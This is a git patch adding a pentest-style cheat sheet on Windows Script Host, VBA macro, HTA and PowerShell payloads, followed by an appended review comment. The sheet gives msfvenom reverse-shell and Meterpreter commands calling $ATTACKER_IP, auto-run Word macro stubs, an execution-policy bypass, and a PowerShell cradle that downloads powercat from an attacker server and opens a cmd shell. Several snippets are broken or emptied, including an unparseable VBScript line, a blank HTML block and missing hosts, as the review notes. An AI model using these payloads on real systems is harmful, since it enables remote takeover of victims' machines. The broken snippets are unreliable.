From c9f70905cf6ef055be3b0b798f30f4de71e5c30a Mon Sep 17 00:00:00 2001 From: whx Date: Fri, 17 Dec 2021 01:06:21 +0100 Subject: [PATCH] payload --- .../payloads/windows_scripting_host.md | 92 +++++++++++++++++++ 1 file changed, 92 insertions(+) create mode 100644 exploit/windows/payloads/windows_scripting_host.md diff --git a/exploit/windows/payloads/windows_scripting_host.md b/exploit/windows/payloads/windows_scripting_host.md new file mode 100644 index 0000000..7d810b9 --- /dev/null +++ b/exploit/windows/payloads/windows_scripting_host.md 
@@ -0,0 +1,92 @@ +# Windows Scripting Host (WSH) + + +## Visual Basic Script (VB Script) +* `cscript file.exe`, command line scripts +* `wscript file.exe`, UI scripts + +* Example (watch out for the whitespace after path, it has to be included) +```sh +Set shell = WScript.CreateObject("Wscript.Shell") +shell.Run("C:\Windows\System32\cmd.exe " & WScript.ScriptFullName),0,True +``` +```sh +c:\Windows\System32>wscript /e:VBScript c:\Users\user\Documents\shell.txt +``` + +## Visual Basic for Application (VBA) +* Access Windows API via Macros +* Open Word, `view` --> `macros`, give a name and select document in `Macros in` +* Create reverse shell +```sh +msfvenom -p windows/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4448 -f vba +``` +* Insert into the following Macro Content, `Workbook_Open()` for excel, `Document_Open()` for Word macros +```sh +Sub Document_Open() + SHELL +End Sub + +Sub AutoOpen() + SHELL +End Sub + +Sub SHELL() + +End Sub +``` + +## HTML Application (HTA) + +* HTML file including some kind of scripting language like JS, VB, ActiveX +* `mshta` is used to excecute + +### POC +* Download file via attacker's web server +* File should look like +```HTML + + + + + +``` +* Save Document in a macros supporting file format like `Word 97-2003 Template` and `Word 97-2003 Document` + + +### Reverse Shell +* Craft reverse shell via `msfvenom` +```sh +msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4448 -f hta-psh -o shell.hta +``` +* `msfconsole` via +```sh +use exploit/windows/misc/hta_server +``` + +## Powershell + +* Powershell execution policy can be checked via +```sh +Get-ExecutionPolicy +``` +* Set policy via +```sh +Set-ExecutionPolicy -Scope CurrentUser RemoteSigned +``` +* Bypass via +```sh +powershell -ex bypass -File shell.ps1 +``` +* Load [powercat](https://github.com/besimorhino/powercat.git) on attacker machine and load it on the target via +```sh +C:\Users\thm\Desktop> powershell -c "IEX(New-Object 
System.Net.WebClient).DownloadString('http://:8000/powercat.ps1');powercat -c -p 4448 -e cmd" +``` +* Or use msfvenom +```sh +msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=4447 -f psh -o payload.ps1 +``` +
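Review bot: several of the embedded examples in this new file will not work or cannot be followed as written, so please verify them before merging. In the VB Script section, `cscript file.exe` / `wscript file.exe` should point at a script file (`.vbs`), not `.exe`; and the line `shell.Run("C:\Windows\System32\cmd.exe " & WScript.ScriptFullName),0,True` does not parse in VBScript, because a Sub called with a parenthesised first argument cannot be followed by further arguments (either drop the parentheses or use `Call`). In the HTA "POC" subsection the ```` ```HTML ```` block is empty, so "File should look like" shows nothing; the HTML content appears to have been lost, and the bullet "Save Document in a macros supporting file format like `Word 97-2003 Template`" belongs to the VBA section above, not to HTA. In the Powershell section the placeholders are missing their values: `http://:8000/powercat.ps1` has no host and `LHOST= LPORT=4447` has no address, most likely angle-bracket placeholders that were stripped; use an explicit placeholder such as `$ATTACKER_IP`, as the VBA and HTA sections already do. Style points: the fences around VBScript and VBA code are tagged `sh` (use `vb` or `vba`) and `HTML` should be lowercase `html`; "excecute" should be "execute", "Visual Basic for Application" should be "Visual Basic for Applications", and the product name is "Windows Script Host", not "Windows Scripting Host". Finally, the `Set-ExecutionPolicy -Scope CurrentUser RemoteSigned` and `powershell -ex bypass` bullets would read better with a sentence on what each does, since the file otherwise lists them without explanation.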